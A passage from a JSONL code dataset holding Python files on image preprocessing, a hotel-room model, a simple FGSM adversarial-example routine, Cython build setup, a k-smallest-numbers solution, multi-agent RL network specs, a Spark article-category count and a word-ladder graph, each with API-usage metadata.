{"api_name": "logging.debug", "line_number": 102, "usage_type": "call"}]}
+{"seq_id": "371877091", "text": "\"\"\"\n对图像进行预处理\n\"\"\"\nimport numpy as np\nimport os\nimport shutil\nimport skimage.io as io\n\n\ndef fill_a_image(image, new_size: tuple):\n \"\"\"\n 对图像做镜像填充,new_size必须大于原image大小\n :param image: 输入图像\n :param new_size: 输出大小\n :return: 输出图像\n \"\"\"\n height, width = image.shape\n new_height, new_width = new_size\n corner_left_width = int((new_width - width) / 2)\n corner_right_width = new_width - width - corner_left_width\n corner_up_height = int((new_height - height) / 2)\n corner_bottom_height = new_height - height - corner_up_height\n\n new_image = np.zeros(new_size)\n\n # up\n new_image[0: corner_up_height, corner_left_width: new_width - corner_right_width] = \\\n np.flipud(image[0: corner_up_height, :])\n # left\n new_image[corner_up_height: new_height - corner_bottom_height, : corner_left_width] = \\\n np.fliplr(image[:, : corner_left_width])\n # bottom\n new_image[new_height - corner_bottom_height:, corner_left_width: new_width - corner_right_width] = \\\n np.flipud(image[height - corner_bottom_height:, :])\n # right\n new_image[corner_up_height: new_height - corner_bottom_height, new_width - corner_right_width:] = \\\n np.fliplr(image[:, width - corner_right_width:])\n # left-up\n new_image[0: corner_up_height, 0: corner_left_width] = \\\n np.fliplr(new_image[: corner_up_height, corner_left_width: corner_left_width * 2])\n # right-up\n new_image[0: corner_up_height, new_width - corner_right_width:] = \\\n np.fliplr(new_image[: corner_up_height, new_width - 2 * corner_right_width: new_width - corner_right_width])\n # left-bottom\n new_image[new_height - corner_bottom_height:, 0: corner_left_width] = \\\n np.fliplr(new_image[new_height - corner_bottom_height:, corner_left_width: corner_left_width * 2])\n # right-bottom\n new_image[new_height - corner_bottom_height:, new_width - corner_right_width:] = \\\n np.fliplr(new_image[new_height - corner_bottom_height:,\n new_width - 2 * corner_right_width: new_width - corner_right_width])\n\n # center\n new_image[corner_up_height: new_height - corner_bottom_height, corner_left_width: new_width - corner_right_width] = \\\n image\n\n new_image = new_image.astype('uint8') # uint8数据类型,拷贝返回\n\n return new_image\n\n\ndef fill_images(from_path: str, save_path: str):\n \"\"\"\n 读取某一个路径下的所有图片,进行镜像填充处理,然后保存到新的路径中\n :param from_path: 来自哪个路径\n :param save_path: 保存到哪个路径\n :return: 无\n \"\"\"\n print(\"fill images in path:\" + from_path)\n file_list = os.listdir(from_path)\n file_list.sort()\n for file_name in file_list:\n new_image = fill_a_image(io.imread(os.path.join(from_path, file_name), as_gray=True), (572, 572))\n if save_path is None:\n continue\n io.imsave(os.path.join(save_path, os.path.splitext(file_name)[0] + '_filled_572x572.png'), new_image)\n print(\"All finished!\")\n\n\ndef mirror_fill():\n \"\"\"\n 图像镜像填充\n :return:无\n \"\"\"\n from_path = ('./membrane_data/data/train/images',\n './membrane_data/data/validation/images',\n './membrane_data/data/predict/images',\n )\n save_path = ('./membrane_data/data/train/images_filled',\n './membrane_data/data/validation/images_filled',\n './membrane_data/data/predict/images_filled',\n )\n # 检查来源路径是否存在\n for path in from_path:\n if os.path.exists(path) is False:\n print(path + ' is not exist! Please check it!')\n return\n\n # 运行前的一些清理、创建\n for i in range(len(save_path)):\n if os.path.exists(save_path[i]): # 保存路径若存在,则删除\n shutil.rmtree(save_path[i]) # 资源管理器打开时也能删除,就是不同创建\n os.mkdir(save_path[i]) # 然后再重新创建(务必关闭资源管理器)\n\n # 对图片进行镜像填充\n for i in range(len(from_path)):\n fill_images(from_path[i], save_path[i])\n\n\n\ndef crop_images():\n from_path = ('./membrane_data/data/train/masks',\n './membrane_data/data/validation/masks',\n )\n save_path = ('./membrane_data/data/train/masks_cropped',\n './membrane_data/data/validation/masks_cropped',\n )\n\n # 检查来源路径是否存在\n for path in from_path:\n if os.path.exists(path) is False:\n print(path + ' is not exist! Please check it!')\n return\n\n # 运行前的一些清理、创建\n for i in range(len(save_path)):\n if os.path.exists(save_path[i]): # 保存路径若存在,则删除\n shutil.rmtree(save_path[i]) # 资源管理器打开时也能删除,就是不同创建\n os.mkdir(save_path[i]) # 然后再重新创建(务必关闭资源管理器)\n\n # 裁剪图像\n for i in range(len(from_path)):\n print(\"crop images in path:\", from_path[i])\n name_list = os.listdir(from_path[i])\n for name in name_list:\n img = io.imread(os.path.join(from_path[i], name), as_gray=True)\n img = np.split(img, [62, 450], axis=0)[1] # 按行裁剪,即裁剪上下两头\n img = np.split(img, [62, 450], axis=1)[1] # 按列裁剪,即裁剪左右两头\n io.imsave(os.path.join(save_path[i], os.path.splitext(name)[0] + \"_cropped_388x388.png\"), img)\n print(\"All finished!\")\nif __name__ == '__main__':\n mirror_fill()\n crop_images()", "sub_path": "lemon_unet/preprocess.py", "file_name": "preprocess.py", "file_ext": "py", "file_size_in_byte": 5712, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "numpy.zeros", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 49, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 69, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 72, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 72, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "skimage.io.imsave", "line_number": 75, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 75, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 101, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 127, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 128, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 133, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 135, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 135, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 135, "usage_type": "attribute"}, {"api_name": "numpy.split", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.split", "line_number": 137, "usage_type": "call"}, {"api_name": "skimage.io.imsave", "line_number": 138, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 138, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path", "line_number": 138, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 138, "usage_type": "call"}]}
+{"seq_id": "642903029", "text": "from typing import Union, List, Tuple\n\nfrom model.Individas import Individas\nfrom model.Pora import Pora\nfrom model.Šeima import Šeima\n\n\nclass Apartamentai:\n numeris: int\n vietų_skaičius: int\n gyvena: Union[List[Individas], Pora, Šeima] = None\n užimtas: bool = False\n\n def __init__(self, numeris, vietų_skaičius):\n self.numeris = numeris\n self.vietų_skaičius = vietų_skaičius\n\n def __ar_galima_apgyvendinti(self, individas):\n lytis = individas.lytis\n for gyventojas in self.gyvena:\n if gyventojas.lytis != lytis and not gyventojas.sutinka:\n return False\n return True\n\n def apgyvendinti(self, grupė: Union[Individas, Pora, Šeima]) -> Tuple[\n bool, Union[Individas, Pora, Šeima, None]]:\n if isinstance(grupė, (Šeima, Pora)):\n if not self.gyvena and self.vietų_skaičius >= grupė.žmonių_skaičius:\n self.gyvena = grupė\n self.užimtas = True\n return True, None\n else:\n return False, grupė\n\n if isinstance(grupė, Individas):\n individas = grupė\n if not self.gyvena:\n self.gyvena = [individas]\n return True, None\n elif self.__ar_galima_apgyvendinti(individas):\n self.gyvena.append(individas)\n if len(self.gyvena) == self.vietų_skaičius:\n self.užimtas = True\n return True, None\n return False, individas\n\n", "sub_path": "ZP18-1/hotel/model/Apartamentai.py", "file_name": "Apartamentai.py", "file_ext": "py", "file_size_in_byte": 1547, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "typing.Union", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 11, "usage_type": "name"}, {"api_name": "model.Individas.Individas", "line_number": 11, "usage_type": "name"}, {"api_name": "model.Pora.Pora", "line_number": 11, "usage_type": "name"}, {"api_name": "model.Šeima.Šeima", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 25, "usage_type": "name"}, {"api_name": "model.Individas.Individas", "line_number": 25, "usage_type": "name"}, {"api_name": "model.Pora.Pora", "line_number": 25, "usage_type": "name"}, {"api_name": "model.Šeima.Šeima", "line_number": 25, "usage_type": "name"}, {"api_name": "model.Šeima.Šeima", "line_number": 27, "usage_type": "name"}, {"api_name": "model.Pora.Pora", "line_number": 27, "usage_type": "name"}, {"api_name": "model.Individas.Individas", "line_number": 35, "usage_type": "argument"}, {"api_name": "typing.Tuple", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 26, "usage_type": "name"}, {"api_name": "model.Individas.Individas", "line_number": 26, "usage_type": "name"}, {"api_name": "model.Pora.Pora", "line_number": 26, "usage_type": "name"}, {"api_name": "model.Šeima.Šeima", "line_number": 26, "usage_type": "name"}]}
+{"seq_id": "247633519", "text": "import numpy as np\nimport keras.backend as K\n\nEPOCHS = 5\nEPSILON = 0.03\n\n\ndef fgsm(reshaped_image, model, shape=(28, 28, 1), num_classes=10):\n\n x = reshaped_image.reshape((-1,) + shape).astype('float32')\n # x = reshaped_image\n\n preds = model.predict(x)\n initial_class = np.argmax(preds)\n\n print('initial class: {}'.format(initial_class), end='')\n\n sess = K.get_session()\n x_adv = x\n x_noise = np.zeros_like(x)\n\n for i in range(EPOCHS):\n target = K.one_hot(initial_class, num_classes)\n\n loss = K.categorical_crossentropy(target, model.output)\n grads = K.gradients(loss, model.input)\n\n delta = K.sign(grads[0])\n x_noise = x_noise + delta\n\n x_adv = x_adv + EPSILON * delta\n\n x_adv = sess.run(x_adv, feed_dict={model.input: x})\n preds = model.predict(x_adv)\n # print('epoch: %d, preds: %f, class: %d' % (i, preds[0][initial_class], np.argmax(preds)))\n\n print(' class: %d' % (np.argmax(preds)))\n return x_adv\n", "sub_path": "others/old_fgsm.py", "file_name": "old_fgsm.py", "file_ext": "py", "file_size_in_byte": 1000, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.argmax", "line_number": 14, "usage_type": "call"}, {"api_name": "keras.backend.get_session", "line_number": 18, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.zeros_like", "line_number": 20, "usage_type": "call"}, {"api_name": "keras.backend.one_hot", "line_number": 23, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 23, "usage_type": "name"}, {"api_name": "keras.backend.categorical_crossentropy", "line_number": 25, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 25, "usage_type": "name"}, {"api_name": "keras.backend.gradients", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 26, "usage_type": "name"}, {"api_name": "keras.backend.sign", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 28, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "517400380", "text": "# -*- coding: utf-8 -*-\nimport warnings\nfrom distutils.command.build_ext import build_ext\nfrom distutils.errors import CCompilerError, DistutilsExecError, DistutilsPlatformError\nfrom setuptools import setup\nfrom Cython.Build import cythonize\nimport numpy\n\nimport versioneer\n\nclass BuildFailure(Exception):\n pass\n\nclass CatchableBuildExt(build_ext):\n def run(self):\n try:\n build_ext.run(self)\n except DistutilsPlatformError:\n raise BuildFailure()\n\n def build_extension(self, ext):\n try:\n build_ext.build_extension(self, ext)\n except (CCompilerError, DistutilsExecError, DistutilsPlatformError):\n raise BuildFailure()\n\ntry:\n setup(version=versioneer.get_version(),\n cmdclass={**versioneer.get_cmdclass(), 'build_ext': CatchableBuildExt},\n ext_modules=cythonize(\n \"perception/**/extensions.pyx\",\n ), include_dirs=[numpy.get_include()])\nexcept BuildFailure:\n warnings.warn('Failed to build Cython extensions. They will not be available at runtime.')\n setup(version=versioneer.get_version(),\n cmdclass=versioneer.get_cmdclass())\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1163, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "distutils.command.build_ext.build_ext", "line_number": 14, "usage_type": "name"}, {"api_name": "distutils.command.build_ext.build_ext.run", "line_number": 17, "usage_type": "call"}, {"api_name": "distutils.command.build_ext.build_ext", "line_number": 17, "usage_type": "name"}, {"api_name": "distutils.errors.DistutilsPlatformError", "line_number": 18, "usage_type": "name"}, {"api_name": "distutils.command.build_ext.build_ext.build_extension", "line_number": 23, "usage_type": "call"}, {"api_name": "distutils.command.build_ext.build_ext", "line_number": 23, "usage_type": "name"}, {"api_name": "distutils.errors.CCompilerError", "line_number": 24, "usage_type": "name"}, {"api_name": "distutils.errors.DistutilsExecError", "line_number": 24, "usage_type": "name"}, {"api_name": "distutils.errors.DistutilsPlatformError", "line_number": 24, "usage_type": "name"}, {"api_name": "setuptools.setup", "line_number": 28, "usage_type": "call"}, {"api_name": "versioneer.get_version", "line_number": 28, "usage_type": "call"}, {"api_name": "versioneer.get_cmdclass", "line_number": 29, "usage_type": "call"}, {"api_name": "Cython.Build.cythonize", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.get_include", "line_number": 32, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 34, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 35, "usage_type": "call"}, {"api_name": "versioneer.get_version", "line_number": 35, "usage_type": "call"}, {"api_name": "versioneer.get_cmdclass", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "221642814", "text": "'''\n输入整数数组 arr ,找出其中最小的 k 个数。例如,输入4、5、1、6、2、7、3、8这8个数字,则最小的4个数字是1、2、3、4。\n示例 1:\n输入:arr = [3,2,1], k = 2\n输出:[1,2] 或者 [2,1]\n\n链接:https://leetcode-cn.com/problems/zui-xiao-de-kge-shu-lcof\n'''\n'''\n分析\n本题最简单的做法是排序。时间复杂度nlogn\n其次是堆 时间复杂度是nlogk\n最后是快速选择,时间复杂度是n\n现在实现后面俩种\n'''\nfrom typing import List\nimport heapq\ndef getLeastNumbers( arr: List[int], k: int) -> List[int]:\n '''\n 堆排序\n :param arr:\n :param k:\n :return:\n '''\n if k == 0:\n return []\n hp=[]\n for i in arr[:k]:\n # 建立小顶堆,使用相反数得到大顶堆\n hp.append(-i)\n heapq.heapify(hp)\n for i in arr[k:]:\n # 现在是大顶推\n if -i > hp[0]:\n heapq.heappop(hp)\n heapq.heappush(hp,-i)\n ans =[-i for i in hp]\n return ans\n\nimport random\ndef getLeastNumbers2( arr: List[int], k: int) -> List[int]:\n '''\n 快速选择法\n :param arr:\n :param k:\n :return:\n '''\n if k == 0:return []\n randomized_selected(arr,0,len(arr)-1,k)\n return arr[:k]\n\ndef randomized_selected(arr:List,l,r,k):\n '''\n 我们定义函数 randomized_selected(arr, l, r, k) 表示划分数组 arr 的 [l,r] 部分,使前 k 小的数在数组的左侧,在函数里我们调用快排的划分函数,假设划分函数返回的下标是 pos(表示分界值 pivot 最终在数组中的位置),即 pivot 是数组中第 pos - l + 1 小的数,\n 那么一共会有三种情况:\n 如果 pos - l + 1 == k,表示 pivot 就是第 kk 小的数,直接返回即可;\n 如果 pos - l + 1 < k,表示第 kk 小的数在 pivot 的右侧,因此递归调用 randomized_selected(arr, pos + 1, r, k - (pos - l + 1));\n 如果 pos - l + 1 > k,表示第 kk 小的数在 pivot 的左侧,递归调用 randomized_selected(arr, l, pos - 1, k)。\n :return:\n '''\n pos = randomized_partition(arr,l,r)\n num = pos - l + 1\n if num < k:\n randomized_selected(arr ,pos +1,r,k-num)\n if num > k:\n randomized_selected(arr,l,pos-1,k)\n\n# 下面利用快排的过程\ndef randomized_partition(arr,l,r):\n pidx = random.randint(l,r)\n arr[l],arr[pidx] = arr[pidx],arr[l]\n m = partition(arr,l,r)\n return m\n\ndef partition(arr,l,r):\n pivot ,j = arr[l],l\n for i in range(l+1,r+1):\n if arr[i] <= pivot:\n j+=1\n arr[i],arr[j] = arr[j],arr[i]\n arr[l],arr[j] = arr[j] ,arr[l]\n return j\n\n\nif __name__ == '__main__':\n arr = [3, 2, 1]\n k = 2\n print(getLeastNumbers2(arr,k))\n", "sub_path": "code/31_最小的K个数.py", "file_name": "31_最小的K个数.py", "file_ext": "py", "file_size_in_byte": 2726, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "typing.List", "line_number": 18, "usage_type": "name"}, {"api_name": "heapq.heapify", "line_number": 31, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 35, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 36, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 52, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 70, "usage_type": "call"}]}
+{"seq_id": "321290750", "text": "# python3\n# Copyright 2021 InstaDeep Ltd. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Architectures using networked agents for multi-agent RL systems\"\"\"\n\nimport copy\nfrom typing import Dict, List, Tuple\n\nimport sonnet as snt\nimport tensorflow as tf\nfrom acme import specs as acme_specs\n\nfrom mava import specs as mava_specs\nfrom mava.components.tf.architectures.decentralised import (\n DecentralisedPolicyActor,\n DecentralisedQValueActorCritic,\n)\n\n\nclass NetworkedPolicyActor(DecentralisedPolicyActor):\n \"\"\"Networked multi-agent actor critic architecture.\"\"\"\n\n def __init__(\n self,\n environment_spec: mava_specs.MAEnvironmentSpec,\n network_spec: Dict[str, List[str]],\n observation_networks: Dict[str, snt.Module],\n policy_networks: Dict[str, snt.Module],\n shared_weights: bool = False,\n ):\n super().__init__(\n environment_spec=environment_spec,\n observation_networks=observation_networks,\n policy_networks=policy_networks,\n shared_weights=shared_weights,\n )\n\n self._network_spec = network_spec\n\n if self._shared_weights:\n raise Exception(\n \"Networked architectures currently do not support weight sharing.\"\n )\n\n def _get_actor_spec(self, agent_key: str) -> Dict[str, acme_specs.Array]:\n \"\"\"Create network structure specifying connection between agents\"\"\"\n actor_obs_specs: Dict[str, acme_specs.Array] = {}\n\n agents_by_type = self._env_spec.get_agents_by_type()\n\n for agent_type, agents in agents_by_type.items():\n actor_obs_shape = list(\n copy.copy(\n self._agent_type_specs[agent_type].observations.observation.shape\n )\n )\n for agent in agents:\n actor_obs_shape.insert(0, len(self._network_spec[agent]))\n actor_obs_specs[agent] = tf.TensorSpec(\n shape=actor_obs_shape,\n dtype=tf.dtypes.float32,\n )\n return actor_obs_specs\n\n\nclass NetworkedQValueCritic(DecentralisedQValueActorCritic):\n \"\"\"Centralised multi-agent actor critic architecture.\"\"\"\n\n def __init__(\n self,\n environment_spec: mava_specs.MAEnvironmentSpec,\n network_spec: Dict[str, List[str]],\n observation_networks: Dict[str, snt.Module],\n policy_networks: Dict[str, snt.Module],\n critic_networks: Dict[str, snt.Module],\n shared_weights: bool = True,\n ):\n super().__init__(\n environment_spec=environment_spec,\n observation_networks=observation_networks,\n policy_networks=policy_networks,\n critic_networks=critic_networks,\n shared_weights=shared_weights,\n )\n\n self._network_spec = network_spec\n\n if self._shared_weights:\n raise Exception(\n \"Networked architectures currently do not support weight sharing.\"\n )\n\n def _get_critic_specs(\n self,\n ) -> Tuple[Dict[str, acme_specs.Array], Dict[str, acme_specs.Array]]:\n critic_obs_specs: Dict[str, acme_specs.Array] = {}\n critic_act_specs: Dict[str, acme_specs.Array] = {}\n\n agents_by_type = self._env_spec.get_agents_by_type()\n\n for agent_type, agents in agents_by_type.items():\n for agent in agents:\n critic_obs_shape = list(copy.copy(self._embed_specs[agent].shape))\n critic_act_shape = list(\n copy.copy(self._agent_specs[agent].actions.shape)\n )\n critic_obs_shape.insert(0, len(self._network_spec[agent]))\n critic_obs_specs[agent] = tf.TensorSpec(\n shape=critic_obs_shape,\n dtype=tf.dtypes.float32,\n )\n critic_act_shape.insert(0, len(self._network_spec[agent]))\n critic_act_specs[agent] = tf.TensorSpec(\n shape=critic_act_shape,\n dtype=tf.dtypes.float32,\n )\n\n return critic_obs_specs, critic_act_specs\n", "sub_path": "multi-agent RL/Mava-develop/mava/components/tf/architectures/networked.py", "file_name": "networked.py", "file_ext": "py", "file_size_in_byte": 4671, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "mava.components.tf.architectures.decentralised.DecentralisedPolicyActor", "line_number": 32, "usage_type": "name"}, {"api_name": "mava.specs.MAEnvironmentSpec", "line_number": 37, "usage_type": "attribute"}, {"api_name": "mava.specs", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 39, "usage_type": "name"}, {"api_name": "sonnet.Module", "line_number": 39, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 40, "usage_type": "name"}, {"api_name": "sonnet.Module", "line_number": 40, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 59, "usage_type": "name"}, {"api_name": "acme.specs.Array", "line_number": 59, "usage_type": "attribute"}, {"api_name": "acme.specs", "line_number": 59, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.TensorSpec", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.dtypes", "line_number": 73, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 57, "usage_type": "name"}, {"api_name": "acme.specs.Array", "line_number": 57, "usage_type": "attribute"}, {"api_name": "acme.specs", "line_number": 57, "usage_type": "name"}, {"api_name": "mava.components.tf.architectures.decentralised.DecentralisedQValueActorCritic", "line_number": 78, "usage_type": "name"}, {"api_name": "mava.specs.MAEnvironmentSpec", "line_number": 83, "usage_type": "attribute"}, {"api_name": "mava.specs", "line_number": 83, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 85, "usage_type": "name"}, {"api_name": "sonnet.Module", "line_number": 85, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 86, "usage_type": "name"}, {"api_name": "sonnet.Module", "line_number": 86, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 87, "usage_type": "name"}, {"api_name": "sonnet.Module", "line_number": 87, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 108, "usage_type": "name"}, {"api_name": "acme.specs.Array", "line_number": 108, "usage_type": "attribute"}, {"api_name": "acme.specs", "line_number": 108, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 109, "usage_type": "name"}, {"api_name": "acme.specs.Array", "line_number": 109, "usage_type": "attribute"}, {"api_name": "acme.specs", "line_number": 109, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 115, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.TensorSpec", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.dtypes", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorSpec", "line_number": 125, "usage_type": "call"}, {"api_name": "tensorflow.dtypes", "line_number": 127, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 107, "usage_type": "name"}, {"api_name": "acme.specs.Array", "line_number": 107, "usage_type": "attribute"}, {"api_name": "acme.specs", "line_number": 107, "usage_type": "name"}]}
+{"seq_id": "63693700", "text": "from pyspark import SparkConf, SparkContext\nfrom google.cloud import storage\nimport json\nfrom datetime import datetime\n\nSAVE_DIR = 'categories'\nGCP_BUCKET = 'gs://big_data_econ'\nsc = SparkContext.getOrCreate()\n\n# Read in all json files into an RDD\n# Use 'wholeTextFiles' to prevent fragmenting of json objects\nmonths = sc.wholeTextFiles(GCP_BUCKET + '/articles_subset/*.json')\n\n# Jsonnify each text string into a dictionary\nmonths = months.map(lambda x: json.loads(x[1]))\narticles = months.flatMap(lambda x: x)\n\ndef get_year_categories(article):\n time = datetime.strptime(article['pub_date'].split('T')[0], '%Y-%m-%d')\n year = time.year\n news_desk = get_field(article, field='news_desk')\n return (year, news_desk)\n\ndef get_field(data, field):\n if field in data and data[field] and data[field]!='None':\n return data[field].lower()\n else:\n return ''\n\n# Aggregate category counts for each year\ncategories = articles.map(lambda article: get_year_categories(article))\n\n# Calculate average article wordcount for a each year\nyear_categories = categories.map(lambda x: (x, 1)).reduceByKey(lambda x, y: x + y)\n\ndf = year_categories.map(lambda x: (x[0][0], x[0][1], x[1])).toDF()\ndf = df.selectExpr('_1 as year', '_2 as category', '_3 as count')\n\n# Save data to Google Cloud Bucket\ndf.coalesce(1).write.format('csv').save('gs://big_data_econ/csvs/' + SAVE_DIR)", "sub_path": "spark_scripts/category_counts.py", "file_name": "category_counts.py", "file_ext": "py", "file_size_in_byte": 1382, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pyspark.SparkContext.getOrCreate", "line_number": 8, "usage_type": "call"}, {"api_name": "pyspark.SparkContext", "line_number": 8, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "name"}]}
+{"seq_id": "75025951", "text": "from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nfrom collections import defaultdict\nfrom itertools import product\n\nfrom alg_breadth_first_search import traverse_bfs\n\nWORDS_FILE = 'four_letter_words.txt'\n\n\ndef read_words():\n \"\"\"Read words file with producing a generator.\"\"\"\n with open(WORDS_FILE) as f:\n for line in f:\n # Skip the end line symbol.\n yield line[:-1]\n\n\ndef build_word_ladder_graph(words):\n vertex_dict = defaultdict(list)\n graph_dict = defaultdict(set)\n\n # Create buckets of words that are different by one letter.\n for word in words:\n for i in xrange(len(word)):\n bucket = '{0}_{1}'.format(word[:i], word[i+1:])\n # if bucket in vertex_dict:\n # vertex_dict[bucket].append(word)\n # else:\n # vertex_dict[bucket] = list(word)\n vertex_dict[bucket].append(word)\n\n # Add vertices and edges for words in the same buckets.\n for bucket, neighbors_ls in vertex_dict.items():\n word_pairs_tuple = (\n ((word1, word2) \n for word1, word2 in product(neighbors_ls, repeat=2) \n if word1 != word2))\n \n for word1, word2 in word_pairs_tuple:\n graph_dict[word1].add(word2)\n graph_dict[word2].add(word1)\n\n return graph_dict\n\n\ndef main():\n words = read_words()\n words_graph = build_word_ladder_graph(words)\n # print(words_graph)\n\n start_word = 'ACID'\n end_word = 'EYED'\n traverse_bfs(words_graph, start_word, end_word)\n\nif __name__ == '__main__':\n main()\n", "sub_path": "alg_word_ladder_bfs.py", "file_name": "alg_word_ladder_bfs.py", "file_ext": "py", "file_size_in_byte": 1639, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "collections.defaultdict", "line_number": 22, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 23, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 39, "usage_type": "call"}, {"api_name": "alg_breadth_first_search.traverse_bfs", "line_number": 56, "usage_type": "call"}]}
